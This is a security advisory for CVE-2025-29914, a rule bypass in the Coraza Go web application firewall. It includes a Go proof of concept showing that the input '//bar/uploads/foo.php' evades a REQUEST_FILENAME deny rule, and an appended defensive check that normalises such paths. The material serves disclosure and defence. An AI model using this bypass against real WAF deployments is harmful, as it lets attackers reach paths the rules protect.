Use of Incorrectly-Resolved Name or Reference Affecting github.com/corazawaf/coraza/v3/internal/corazawaf package, versions <3.3.3


Severity: medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept

  • Snyk ID: SNYK-GOLANG-GITHUBCOMCORAZAWAFCORAZAV3INTERNALCORAZAWAF-9510956
  • Published: 23 Mar 2025
  • Disclosed: 20 Mar 2025
  • Credit: blotus

Introduced: 20 Mar 2025

CVE-2025-29914
CWE-706

How to fix?

Upgrade github.com/corazawaf/coraza/v3/internal/corazawaf to version 3.3.3 or higher.

Overview

Affected versions of this package are vulnerable to Use of Incorrectly-Resolved Name or Reference when parsing URIs in ProcessURI(). An attacker can bypass security rules by sending URIs that start with //, which leads to an incorrect value being set for REQUEST_FILENAME, so rules that match on that variable are evaluated against the wrong path.

PoC

package main

import (
    "fmt"
    "os"

    "github.com/corazawaf/coraza/v3"
)

// Rule 1 denies any request whose REQUEST_FILENAME points at a script
// under /bar/uploads/; debug logging goes to stdout so the evaluated
// value of REQUEST_FILENAME is visible.
const testRule = `
SecDebugLogLevel 9
SecDebugLog /dev/stdout
SecRule REQUEST_FILENAME "@rx /bar/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)" "id:1,phase:1,deny"
`

func main() {
    // Default input is the bypass case; set TEST_URL to compare other URIs
    // (for example the single-slash form, which the rule does catch).
    var testURL = "//bar/uploads/foo.php"

    if os.Getenv("TEST_URL") != "" {
        testURL = os.Getenv("TEST_URL")
    }

    fmt.Printf("Testing URL: %s\n", testURL)

    config := coraza.NewWAFConfig().WithDirectives(testRule)

    waf, err := coraza.NewWAF(config)

    if err != nil {
        panic(err)
    }

    tx := waf.NewTransaction()

    // ProcessURI parses the request URI and populates REQUEST_FILENAME;
    // the phase-1 rule is then evaluated in ProcessRequestHeaders.
    tx.ProcessURI(testURL, "GET", "HTTP/1.1")

    in := tx.ProcessRequestHeaders()

    // A non-nil interruption means rule 1 fired; on affected versions the
    // default "//" input produces no interruption.
    if in != nil {
        fmt.Printf("%+v\n", in)
    }
}
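The parsing discrepancy behind the bypass, shown with Go's net/url together with a normalising check a WAF integrator can run on the raw request-target. This is an added example, not part of the advisory or of the Coraza project; it assumes REQUEST_FILENAME is derived from net/url's Path, and the function names are hypothetical.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// ParsedPath returns the host and path net/url yields for a raw request-target.
// A target beginning with "//" parses as scheme-relative: its first segment
// becomes the host and is dropped from Path.
func ParsedPath(rawTarget string) (host, path string, err error) {
	u, err := url.Parse(rawTarget)
	if err != nil {
		return "", "", err
	}
	return u.Host, u.Path, nil
}

// OriginFormPath reads the target as an HTTP origin-form path, where leading
// slashes are never an authority; extra leading slashes collapse to one.
func OriginFormPath(rawTarget string) (string, error) {
	if strings.HasPrefix(rawTarget, "//") {
		rawTarget = "/" + strings.TrimLeft(rawTarget, "/")
	}
	u, err := url.Parse(rawTarget)
	if err != nil {
		return "", err
	}
	return u.Path, nil
}

// IsAuthorityConfused reports whether the two readings disagree, i.e. whether
// a rule keyed on REQUEST_FILENAME would be evaluated against the wrong path.
func IsAuthorityConfused(rawTarget string) bool {
	_, parsed, err := ParsedPath(rawTarget)
	if err != nil {
		return false
	}
	safe, err := OriginFormPath(rawTarget)
	return err == nil && parsed != safe
}

func main() {
	// Constructed request-targets: the second is the advisory's PoC input.
	for _, t := range []string{"/bar/uploads/foo.php", "//bar/uploads/foo.php"} {
		h, p, _ := ParsedPath(t)
		s, _ := OriginFormPath(t)
		fmt.Printf("%-22s host=%q parsed=%q origin=%q confused=%v\n", t, h, p, s, IsAuthorityConfused(t))
	}
}
```

Rejecting or normalising a request-target for which IsAuthorityConfused is true, before the WAF sees it, closes the gap on deployments that cannot upgrade immediately.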
